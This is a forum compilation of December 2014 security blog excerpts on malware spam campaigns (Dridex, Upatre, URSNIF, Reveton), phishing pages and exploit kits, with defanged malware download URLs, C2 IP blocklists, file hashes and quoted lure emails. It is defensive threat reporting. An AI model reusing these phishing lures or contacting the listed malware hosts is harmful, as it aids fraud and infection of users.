- http://blog.trendmicro.com/trendlabs-security-intelligence/reveton-ransomware-spreads-with-old-tactics-new-infection-method/
Dec 11, 2014 - "... Over the past few months spanning October up to the last weeks of November, we observed a noticeable increase in REVETON malware variants, in particular, TROJ_REVETON.SM4 and TROJ_REVETON.SM6... Below is the warning message along with a MoneyPak form to transfer the payment of $300 USD. The message also warns users that they have only 48 hours to pay the fine.
Fake warning messages from Homeland Security and the ICE Cyber Crime Center:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/homeland_ice.png
... the healthcare industry seems to be the most affected industry by this malware and mostly centered in the United States, followed by Australia. Below is a ranking of most affected countries by this new wave of REVETON malware spanning October to November 2014.
Data for TROJ_REVETON.SM4 and TROJ_REVETON.SM6 for October – November 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/reveton-new-infect2.jpg
... It might be jarring for users to suddenly receive a message supposedly sent by law enforcement agencies. However, they need to keep in mind that this is just a tactic intended to “scare” users into paying the fee. Users might also be tempted to pay the ransom to get their computers up and running once again. Unfortunately, there is no guarantee that paying the ransom will result in having the computer screen unlocked. Paying the ransom will only guarantee more money going into the pockets of cybercrooks... Some ransomware variants arrive as attachments of spammed messages. As such, users should be wary of opening emails and attachments, especially those that come from unverified sources. If the email appears to come from a legitimate source (read: banks and other institutions), users should verify the email with the bank. If from a personal contact, -confirm- if they sent the message. Do not rely solely on trust by virtue of relationship, as friends or family members may be victims of spammers as well."
___

Phish: CloudFlare SSL certificate abused
- https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/
Dec 11, 2014 - "... received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a
-fake- invoice:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/unphish.png
... What struck our interest here was the fact that this link was https based. It was indeed a secure connection... with a valid certificate:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/certificatechain.png
On September 29, CloudFlare, a CDN and DNS provider amongst other things, announced Universal SSL, a feature available to all its paid and free customers. It is not the first time cyber-criminals are abusing CloudFlare, and this case is not entirely surprising. By giving a false sense of security (the HTTPS padlock), users are more inclined to follow through and download the malicious file.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/properties.png
... CloudFlare is issuing a warning that the URL is a ‘Suspected phishing site':
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/warning.png
In some regard SSL certifications may become like digitally signed files, where while they do add a level of trust one should still exercise caution and not blindly assume everything is fine. It might be difficult to keep up with each and every new site that wants to abuse the system (cat-and-mouse game)... We can certainly expect cyber criminals to start using SSL more and more given that it is freely available and not extremely difficult to put in place. Another standard known as Extended Validation Certificate SSL (EV SSL) requires additional validation than plain SSL, but again, this does not make things simple for the end user. If regular SSL is deemed weak, then we have a bit of a problem... We have reported this URL to CloudFlare and hope they can revoke the SSL certificate and shutdown the site."

:fear: :mad:

FYI...

Info-Stealing file infector hits US, UK
- http://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/
Dec 11, 2014 5:15 pm (UTC-7) - "... there has been a spike in infections related to the malware URSNIF. The URSNIF family is known to steal information such as passwords. Spyware are always considered high risk, but these URSNIF variants can cause damage beyond info-stealing. These URSNIF variants are file-infectors — which is the cause of the noted spike... the countries most affected by the spike are the United States and the United Kingdom. These two countries comprise nearly 75% of all the infections related to these URSNIF variants. Canada and Turkey are the next countries most affected by malware.
Countries affected by URSNIF spike, based on data gathered for December 2014 so far:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike.jpg
Additional feedback shows that education, financial, and manufacturing were among the industries affected by this spike... It infects all .PDF, .EXE, and .MSI files found in all removable drives and network drives. URSNIF packs the found files and embeds them to its resource section. When these infected files were executed, it will drop the original file in %User Temp% (~{random}.tmp.pdf, ~{random}.tmp.exe) and then execute it to trick user that the opened file is still fine... After deleting the original .PDF file, it will create an .EXE file using the file name of the original .PDF file. As for .MSI and .EXE files, it will insert its code to the current executable. It will only infect .EXE files with “setup” on its filename.
Difference between an infected (top) and clean (bottom) .PDF file. The infected file is 3.18 MB while the clean file is 2.89 MB:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike3.png
For MSI files, it will execute the original file first before executing the malware code. For .PDF and .EXE files, it will produce a dropper-like Trojan, which will drop and execute the original file and the main file infector... The malware family URSNIF is more known as spyware. Variants can monitor network traffic by hooking network APIs related to top browsers such as Internet Explorer, Google Chrome, and Mozilla Firefox. It is also known for gathering information. However, the fact that a family known for spyware now includes file infectors shows that cybercriminals are not above tweaking established malware to expand its routines... A different file infector type (e.g., appending) requires a different detection for security solutions; not all solutions may have this detection. Another notable feature for this particular malware is that it starts its infection routine 30 minutes after its execution... variants often arrive via spammed messages and Trojan dropper/downloader malware. Users need a comprehensive security solution that goes beyond detecting and blocking malware. Features like email reputation services which can detect and block spam and other email-related threats can greatly boost a computer’s security... infected .PDF and .EXE files as PE_URSNIF.A2. Infected .MSI files are detected as PE_URSNIF.A1.
Hash of the related file:
dd7d3b9ea965af9be6995e823ed863be5f3660e5
44B7A1555D6EF109555CCE88F2A954CAFE56B0B4
EFC5C6DCDFC189742A08B25D8842074C16D44951
FD3EB9A01B209572F903981675F9CF9402181CA1 "
___

Fake 'Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/wavecablecom-order-r58551-spam.html
12 Dec 2014 - "This -fake- invoice comes with a malicious attachment.
From: kaybd2@ wavecable .com
Date: 12 December 2014 at 17:17
Subject: Order - R58551
Thanks for placing order with us today! Your order is now on process.
Outright Purchase: 6949 US Dollars
Please click the word file provided below to see more details about your order.
BILLING DETAILS
Order Number: ZJW139855932
Purchase Date: 13.07 11.12.2014
Customer Email: info@ [redacted]

Attached is a malicious Word document INVOICE_7794.DOC which has a detection rate of 4/56* on VirusTotal... macro downloads an executable from:
http ://www.2fs. com .au/tmp/rkn.exe
That has a VirusTotal detection rate of 5/55**... A malicious DLL is dropped onto the system with a VirusTotal detection rate of 2/56***. The only detections are generic, but similar dropped DLLs have been the Dridex banking trojan.
Recommended blocklist:
209.208.62.36
5.187.1.78
46.250.6.1
5.135.28.106
66.213.111.72
95.211.188.129 "
* https://www.virustotal.com/en/file/902aa90dd61f1a89a547726ff06555285463c826d1af673ebdcc148c2200b229/analysis/1418406000/

** https://www.virustotal.com/en/file/90fca160a837f62fdcff2fc3d0a849498a3485c39c7c42a12dc959f5e5db0e56/analysis/1418406121/

*** https://www.virustotal.com/en/file/b13eb856439baf196084f6fc47825d9c677199f71724f351cdd193e30e2618c4/analysis/1418408045/
___

Spammers Accelerate Dyre Distribution
- http://www.threattracksecurity.com/it-blog/dyre-spam/
Dec 12, 2014 - "... Over the last few weeks, the cybercriminals behind Dyre have continued to refine their delivery tactics, and the Trojan is now capable of helping to spread itself and other malware. Our researchers have observed that systems infected with Dyre are not only at risk of the malware stealing log-in credentials, but it may also receive commands to download and install additional spammers – including the Cutwail/Pushdo botnet – to more broadly propagate Dyre. Pushdo is responsible for a large portion of Upatre spam, and the botnet is actively distributing Dyre and other malware, including the data-encrypting ransomware CryptoWall... The bad guys are pulling out all the stops when it comes to distributing their malicious spam. Everything from fraudulent PayPal security alerts to a Top Gun-inspired tale about a Norwegian fighter pilot crossing paths with a Russian MiG to a fake survey purporting to ask recipients their opinions on the controversial events in Ferguson, Missouri, have all been employed to trick recipients into clicking links and opening infected attachments. We recently observed Dyre downloading three spammers. The first, is Pushdo, which runs its own spammer modules. The second and third are a standalone spammers, one of which hijacks the victim’s Microsoft Outlook application to send personal emails with attachments harboring Upatre. The third spammer (see images and email text below from a small sampling) is generating a separate campaign and is increasing in frequency over the last several weeks. All this signals that Dyre is poised to become a more pervasive threat and increasingly active in malicious spam campaigns.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/12/CNN-Norwegian-Russian-MiG-Spam.png
(Multiple other SPAM samples shown at the threattracksecurity URL at the top of this post.)
...Ensure your antivirus and endpoint security is up-to-date, and deploy a robust email security solution to protect your organization from malicious spam. IT admins should continue to educate their users about email-borne threats and stress that despite them being at work, they shouldn’t click links and open attachments without regard for security... Consumers should -always- be cautious about what they click, and if there is any doubt about a warning, special offer or request for private information, contact the bank, retailer or service provider directly by -phone- to confirm."
___

Wire transfer spam spreads Upatre
- http://blogs.technet.com/b/mmpc/archive/2014/12/11/wire-transfer-spam-spreads-upatre.aspx
11 Dec 2014 - "... currently monitoring a spam email campaign that is using a wire transfer claim to spread Trojan:Win32/Upatre. It is important to note that customers running up-to-date Microsoft security software are protected from this threat..."

:fear::fear: :mad:

FYI...

Fake 'Payment Advice' SPAM - malicious doc attached
- http://blog.dynamoo.com/2014/12/malware-spam-ifs-applications.html
15 Dec 2014 - "This -fake- payment advice spam is not from Vitacress but is a -forgery- with a malicious Word document attached.
From: IFS Applications [Do_Not_Reply@ vitacress .co.uk]
Date: 15 December 2014 at 07:49
Subject: DOC-file for report is ready
The DOC-file for report Payment Advice is ready and is attached in this mail.

Attached is a file Payment Advice_593016.doc which is actually one of two different documents with zero detections at VirusTotal [1] [2] and contain one of two malicious macros... that download a malware binary from one of the following locations:
http ://gv-roth .de/js/bin.exe
http ://notaxcig .com/js/bin.exe
This file is saved as %TEMP%\DYIATHUQLCW.exe and is currently has a VirusTotal detection rate of just 1/52*. The ThreatExpert report and Malwr report shows attempted connections to the following IPs which have been used in many recent attacks and should be -blocked- if you can:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1, US)
The malware almost definitely drops the Dridex trojan onto the target system, but I have not been able to get a sample of this yet."
1] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418633977/

2] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418633990/

* https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/1418634587/

>> http://myonlinesecurity.co.uk/ifs-applications-doc-file-report-ready-word-doc-malware/
15 Dec 2014
1] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418628093/

2] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418628835/

- http://blog.mxlab.eu/2014/12/15/email-doc-file-for-report-is-ready-contains-malicious-word-macro-file-that-downloads-trojan/
Dec 15, 2014
> https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/
... Behavioural information
TCP connections
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

GoDaddy 'Account Notice' - Phish ...
- http://www.hoax-slayer.com/godaddy-account-error-phishing-scam.shtml
Dec 15, 2014 - "Email purporting to be from web hosting company GoDaddy claims that your account may pose a potential performance risk to the server because it contains 'too many directories'... The email is -not- from GoDaddy. It is a phishing scam designed to steal your GoDaddy login details. A link in the message takes you to a -fake- Go Daddy login page...
Example:
Subject: Account Notice : Error # 7962
Dear Valued GoDaddy Customer: Brett Christensen
Your account contains more than 3331 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.
In order to prevent your account from being locked out we recommend that you create special TMP directory.
Or use the link below :
[Link Removed]
Sincerely,
GoDaddy Customer Support...

... criminals responsible for this phishing attack can use the stolen login details to hijack the victims' GoDaddy account. Once they have gained access to the account, the criminals can take control of the victim's website and email addresses and use them to perpetrate, spam, scam, and malware attacks. Always login to your online accounts by entering the web address into your browser's address bar rather than by clicking-a-link in an email."

:fear: :mad:

FYI...

Fake 'eFax Drive' SPAM - malicious ZIP
- http://blog.mxlab.eu/2014/12/16/url-in-fake-email-from-efax-drive-youve-received-a-new-fax-leads-to-malicious-zip-archive/
Dec 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “You’ve received a new fax”. This email is sent from the -spoofed- address and has the following body:
New fax at SCAN9106970 from EPSON by https ://******* .com
Scan date: Tue, 16 Dec 2014 13:17:59 +0000
Number of pages: 2
Resolution: 400×400 DPI
You can secure download your fax message at:
hxxp: //nm2b .org/bhnjhkkgvq/ufqielyyva.html
(eFax Drive is a file hosting service operated by J2, Inc.)

The downloaded file document7241_pdf.zip contains the 33 kB large file document7241_pdf.scr. The trojan is known as Packed.Win32.Katusha.1!O or Malware.QVM20.Gen. At the time of writing, 2 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d8b1d64ae49b437df163061af11c8f0f0e5dad338c37cfedd4e6f30e37f6499c/analysis/

nm2b .org: 173.254.28.126: https://www.virustotal.com/en/ip-address/173.254.28.126/information/
___

Fake 'Bank account frozen' SPAM - doc malware
- http://myonlinesecurity.co.uk/bank-account-frozen-notice-note-attention-fake-word-doc-malware/
16 Dec 2014 - "'Bank account frozen notice, note, attention. Attention #CITI-44175PI-77527' with a cab attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
Notification Number: 8489465
Mandate Number: 6782144
Date: December 16, 2014. 01:13pm
In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file “CITI-44175PI-77527.cab” for details.
Yours truly,
Kathy Schuler ...

16 December 2014: CITI-44175PI-77527.cab : Extracts to: CITI-44175PI-77527.scr
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word.doc file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0699621c07f92b81d0b7eef250ae15830c10034b8f1b04a07e0fb43cbcfea54/analysis/1418745402/
___

Wells Fargo Secure Meessage Spam
http://threattrack.tumblr.com/post/105365947973/wells-fargo-secure-meessage-spam
Dec 16, 2014 - "Subjects Seen:
You have a new Secure Message
Typical e-mail details:
You have received a secure message
Read your secure message by download document-75039.pdf. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting:
nexpider .com/sawdnilhvi/ckyilmmoca.html

Malicious URLs:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious File Name and MD5:
document82714.scr (98FE8CAD93B6FCDE63421676534BCC57)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8dec4c587c25e211bdabdb5bb92d35e4/tumblr_inline_ngostrpvc41r6pupn.png

Tagged: Upatre, Wells Fargo
____

Trawling for Phish
- https://blog.malwarebytes.org/online-security/2014/12/trawling-for-phish/
Dec 16, 2014 - "... avoid on your travels, whether you’re sent a link to them directly or see the URLs linked in an email. First up, a page located at:
secure-dropboxfile (dot)hotvideostube(dot)net/secure-files-dropbox/document/
It claims to offer a shared Dropbox document in return for entering your email credentials. It follows the well-worn pattern of offering multiple login options for different types of email account, including Gmail, AOL, Windows Live, Yahoo and “other”:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn1.jpg
The website itself has a poor reputation on Web of Trust, has been listed as being compromised on defacement archives and was also hosting a banking phish not so long ago. Should visitors attempt to login, it sends them to a shared Google Document (no Dropbox files on offer here) which is actually a “public prayer request” spreadsheet belonging to a Church:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn3.jpg
The next page is Google Drive themed and located at:
yellowpagesexpress (dot)com/cgi-bin/Secure Management/index(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn2.jpg
As before, it asks the visitor to login with the widest possible range of common email accounts available, before sending those who enter their details to an entirely unrelated Saatchi Art investment webpage. Readers should always be cautious around pages claiming to offer up files in return for email logins – it’s one of the most common tactics for harvesting password credentials."

:fear: :mad:

FYI...

Fake 'PL REMITTANCE' malware SPAM
- http://blog.dynamoo.com/2014/12/pl-remittance-details-ref844127rh.html
17 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Briana
Date: 17 December 2014 at 08:42
Subject: PL REMITTANCE DETAILS ref844127RH
The attached remittance details the payment of £664.89 made on 16-DEC-2014 by BACSE.
This email was generated using PL Payment Remittance of Integra Finance System.
Can you please check that your supplier details are correct, if any changes are required please email back to this email address quoting your remittance reference.

The reference in the subject and the name of the Excel attachment differ from email to email, but are always consistent in the same message. There are two poorly detected malicious Excel files that I have seen [1] [2] containing two slightly different macros.. which then reach out to the following download locations:
http ://23.226.229.112:8080/stat/lldv.php
http ://38.96.175.139:8080/stat/lldv.php
The file from these locations is downloaded as test.exe and is then saved to %TEMP%\VMHKWKMKEUQ.exe. This has a VirusTotal detection rate of 1/55*. The ThreatTrack report shows it POSTing to the following IP:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP has been used in several recent attacks and I strongly recommend blocking it. The Malwr report also shows it dropping a malicious DLL identified as Dridex. The ThreatExpert report gives some different IPs being contacted:
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer, Germany)
The Ukrainian IP is definitely malicious, but if you wanted to establish maximum protection then I would recommend the following blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
23.226.229.112
38.96.175.139 "
1] https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418810946/

2] https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418810941/

* https://www.virustotal.com/en/file/a1699fdddc2ffcfdc55b71861b7851719cb277a655053403b1a6fec0c895a264/analysis/1418810686/

> http://blog.mxlab.eu/2014/12/17/new-fake-email-pl-remittance-details-ref1790232eg-with-malcious-xls-in-the-wild/
Dec 17, 2014
Screenshot of the XLS: http://img.blog.mxlab.eu/2014/20141205_remittance_01.gif
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/

> http://myonlinesecurity.co.uk/integra-finance-system-pl-remittance-details-ref6029413oh-excel-xls-malware/
17 Dec 2014
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418816542/

> https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418817871/
___

Fake 'Blocked ACH Transfer' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/12/blocked-ach-transfer-spam-has-malicious.html
17 DEC 2014 - "Another spam run pushing a malicious Word attachment..
Date: 17 December 2014 at 07:27
Subject: Blocked ACH Transfer
The ACH transaction (ID: 618003565), recently sent from your online banking account, was rejected by the Electronic Payments Association.
Canceled transaction
ACH file Case ID 623742
Total Amount 2644.93 USD
Sender e-mail info@mobilegazette.com
Reason for rejection See attached word file
Please see the document provided below to have more details about this issue...
Screenshot: https://2.bp.blogspot.com/-HHVnC18smUE/VJGXBjF2VVI/AAAAAAAAF-o/yzQZ2etQFYk/s1600/ach.png

Attached is a file ACH transaction 3360.doc which isn't actually a Word 97-2003 document at all, but a malicious Word 2007 document that would normally have a .DOCX extension (which is basically a ZIP file). The current VirusTotal detection rate of this is just 1/55*. Inside this is a malicious macro... which downloads a file from:
http ://www.lynxtech .com.hk/images/tn.exe
This has a VirusTotal detection rate of just 1/54**. The Malwr report shows it POSTING to 5.187.1.78 (Fornex Hosting, Germany) and also a query to 209.208.62.36 (Atlantic.net, US). Presumably this then drops additional components onto the infected system, although I do not know what they are.
Recommended blocklist:
5.187.1.78
209.208.62.36 "
* https://www.virustotal.com/en/file/61b8edb31972b04fd2652278cca4431f498ed7930833848233da057ebf842660/analysis/1418826644/

** https://www.virustotal.com/en/file/1269bc3080617da54bdf74b04073c273109545643159883147f141742eb9fc75/analysis/1418826840/
___

Exploit Kits in 2014
- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-new-in-exploit-kits-in-2014/
Dec 17, 2014 - "... Exploits targeting Internet Explorer, Silverlight, and Adobe Flash vulnerabilities were frequently used by exploit kits in the past year. The four vulnerabilities below were some of the most frequently targeted by exploit kits:
CVE-2013-0074 (Silverlight)
CVE-2014-0515 (Adobe Flash)
CVE-2014-0569 (Adobe Flash)
CVE-2014-2551 (Internet Explorer)
The most notable change in this list is the relative absence of Java vulnerabilities. Exploit kits have been removing Java because of the increasing use of click-to-play for Java applets, rendering Java a far less attractive target for exploits. The tables below shows which exploits are in use by exploit kits:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png
Plugin Detection: Almost all exploit kits run some sort of software that detect the browser platform a would-be victim is running in order to determine which exploit to send to the user.
The code necessary to do this varies from one exploit kit to another, and is actually fairly complex due to the number of permutations of browsers and plugins that are possible.
Two exploit kits – Nuclear and FlashPack – use a legitimate JavaScript library, PluginDetect. This minimizes the work the creators of the exploit kit need to do, as well as providing a complete set of features. However, this also means that this library has known characteristics: this makes it more visible to security vendors looking for sites used by exploit kits. By contrast, most exploit kits write their own library to perform this task. This makes detection harder, but it also reduces the capabilities of the libraries. Many of these libraries, for example, will only function under Internet Explorer. The Magnitude exploit kit uses a third method – server-side code – too. The following table summarizes which libraries are used.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/exploit-kit-detect-b.png
Antivirus Detection: A new feature that has been added to exploit kits is the ability to detect installed security software. If certain specific security products are installed, the exploit kit will stop itself from running. Both antivirus products and virtual machine software can be targeted in this manner. This behavior is possible due to a vulnerability in Internet Explorer (CVE-2013-7331). This vulnerability allows an attacker to check for the presence of files and folders on an affected system. It was first reported to Microsoft in February 2014, but was only patched in September of the same year as part of MS14-052. The following table summarizes the products that each exploit kit detects:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-software.png
Obfuscation Techniques: Exploit kits regularly use various techniques to obfuscate their activity, but some exploit kits have added new techniques. In both of these cases, the attackers are using legitimate tools to obfuscate their files. The Angler exploit kit now uses the Pack200 format to help avoid detection. Pack200 is a compactive archive format that was developed by Sun (Java’s original developers) to compress .JAR files significantly. Tools to uncompress these files are provided as part of the Java development kit, but many security products don’t support these formats (so they are unable to scan the said malicious file)...
Summary: Exploit kit developers have not been idle in the year since the collapse of the Blackhole exploit kit. They have made various improvements that help improve the capabilities of these tools. The defenses against these tools on the part of users remains the same. We highly recommend that users implement all updates to their software as is practical, since many of the vulnerabilities targeted by attackers have long been fixed by software vendors."
___

Dyre Banking Trojan - Secureworks
- http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
Dec 17 2014

:mad: :fear::fear:

FYI...

More than 100,000 'WordPress sites infected with Malware'
- https://www.sans.org/newsletters/newsbites/xvi/99#301
Dec 15, 2014 - "More than 100,000 websites running on WordPress content management system have been found to be infected with malware that attacks the devices of site visitors. Google has blacklisted more than 11,000 domains. Reports suggest that the attackers exploited a vulnerability in the Slider Revolution Premium plug-in*, which the company has known about since September 2014..."
> http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
Dec 15, 2014
(More links at the sans URL above.)

* http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Dec 14, 2014
___

Fake 'AquAid Card' SPAM – doc malware
- http://myonlinesecurity.co.uk/tracey-smith-aquaid-card-receipt-word-doc-malware/
18 Dec 2014 - "'AquAid Card Receipt' pretending to come from Tracey Smith <tracey.smith@aquaid.co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. If protected view mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you. Definitely DO -NOT- follow the advice they give to enable macros to see the content... The email looks like:
Hi
Please find attached receipt of payment made to us today
Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Card-Receipt-Aquaid-malicious-email.jpg

The macros in this malicious word doc try to connect to http ://sardiniarealestate .info/js/bin.exe ..which is saved as %TEMP%\YEWZMJFAHIB.exe – this has a marginally better detection rate of 3/53*. As we have seen in so many recent attacks like this one, there are 2 versions of the malware:
18 December 2014 : CAR014 151239.doc ( 124kb) | Current Virus total detections: 2/56**
CAR014 151239.doc (130 kb) | Current Virus total detections: 2/55***
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them..."
* https://www.virustotal.com/en/file/b73b4a11f725137a4e1aa19236a5b61671d0880edc8ba1c4d7dd22031e55a922/analysis/1418893740/

** https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418891360/

*** https://www.virustotal.com/en/file/048714ed23c86a32f085cc0a4759875219bdcb0eb61dabb2ba03de09311a1827/analysis/1418891888/


> http://blog.dynamoo.com/2014/12/malware-spam-aquaidcouk-card-receipt.html
18 Dec 2014
- https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418893415/
... Recommended blocklist:
74.208.11.204
81.169.156.5 "
___

Fake 'Internet Fax' SPAM - trojan Upatre.FH
- http://blog.mxlab.eu/2014/12/18/email-internet-fax-job-contains-url-that-downloads-trojan-upatre-fh/
Dec 18, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”, the email is sent from the spoofed address “MyFax <no-replay@ my-fax.com>” and has the following body:
Fax image data
hxxp ://bursalianneler .com/documents/fax.html

The downloaded file fax8642174_pdf contains the 21 kB large file fax8642174_pdf.exe. The trojan is known as Upatre.FH. The trojan will installs itself by creating the service ioiju.exe and makes sure that it boots when Windows starts, modifies several Windows registries... At the time of writing, 1 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/745a25bcff06daf957730207c8b34704288fc5232fac81a228a5f2b4f577f048/analysis/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.52.226: https://www.virustotal.com/en/ip-address/192.185.52.226/information/
78.46.73.197: https://www.virustotal.com/en/ip-address/78.46.73.197/information/
UDP communications
203.183.172.196: https://www.virustotal.com/en/ip-address/203.183.172.196/information/
203.183.172.212: https://www.virustotal.com/en/ip-address/203.183.172.212/information/
___

Fake 'JPMorgan Chase' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-received-new-secure-message-fake-pdf-malware/
17 Dec 2014 - "'JPMorgan Chase & Co You have received a new secure message' pretending to come from random names @jpmorgan .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Need Help?
Your personalized image for: <redacted>
This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE
Copyright 2013 JPMorgan Chase & Co. All rights reserved

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/You-have-received-a-new-secure-message.jpg

17 December 2014: message_zdm.zip: Extracts to: message_zdm.exe
Current Virus total detections: 11/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/25808f5afa8c93d477a954e4a0444b63fbaccac72a56dcd87d252df2606c0e19/analysis/1418844158/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
217.199.168.166: https://www.virustotal.com/en/ip-address/217.199.168.166/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.10.68.178: https://www.virustotal.com/en/ip-address/217.10.68.178/information/

- http://threattrack.tumblr.com/post/105464831328/jp-morgan-chase-secure-message-spam
Dec 18, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/af4b5b4c92d5319141774b223b9140b5/tumblr_inline_ngqwacJHwm1r6pupn.png
Tagged: JPMorgan, Upatre
___

ICANN e-mail accounts, zone database breached in spearphishing attack
Password data, other personal information of account holders exposed.
- http://arstechnica.com/security/2014/12/icann-e-mail-accounts-zone-database-breached-in-spearphishing-attack/
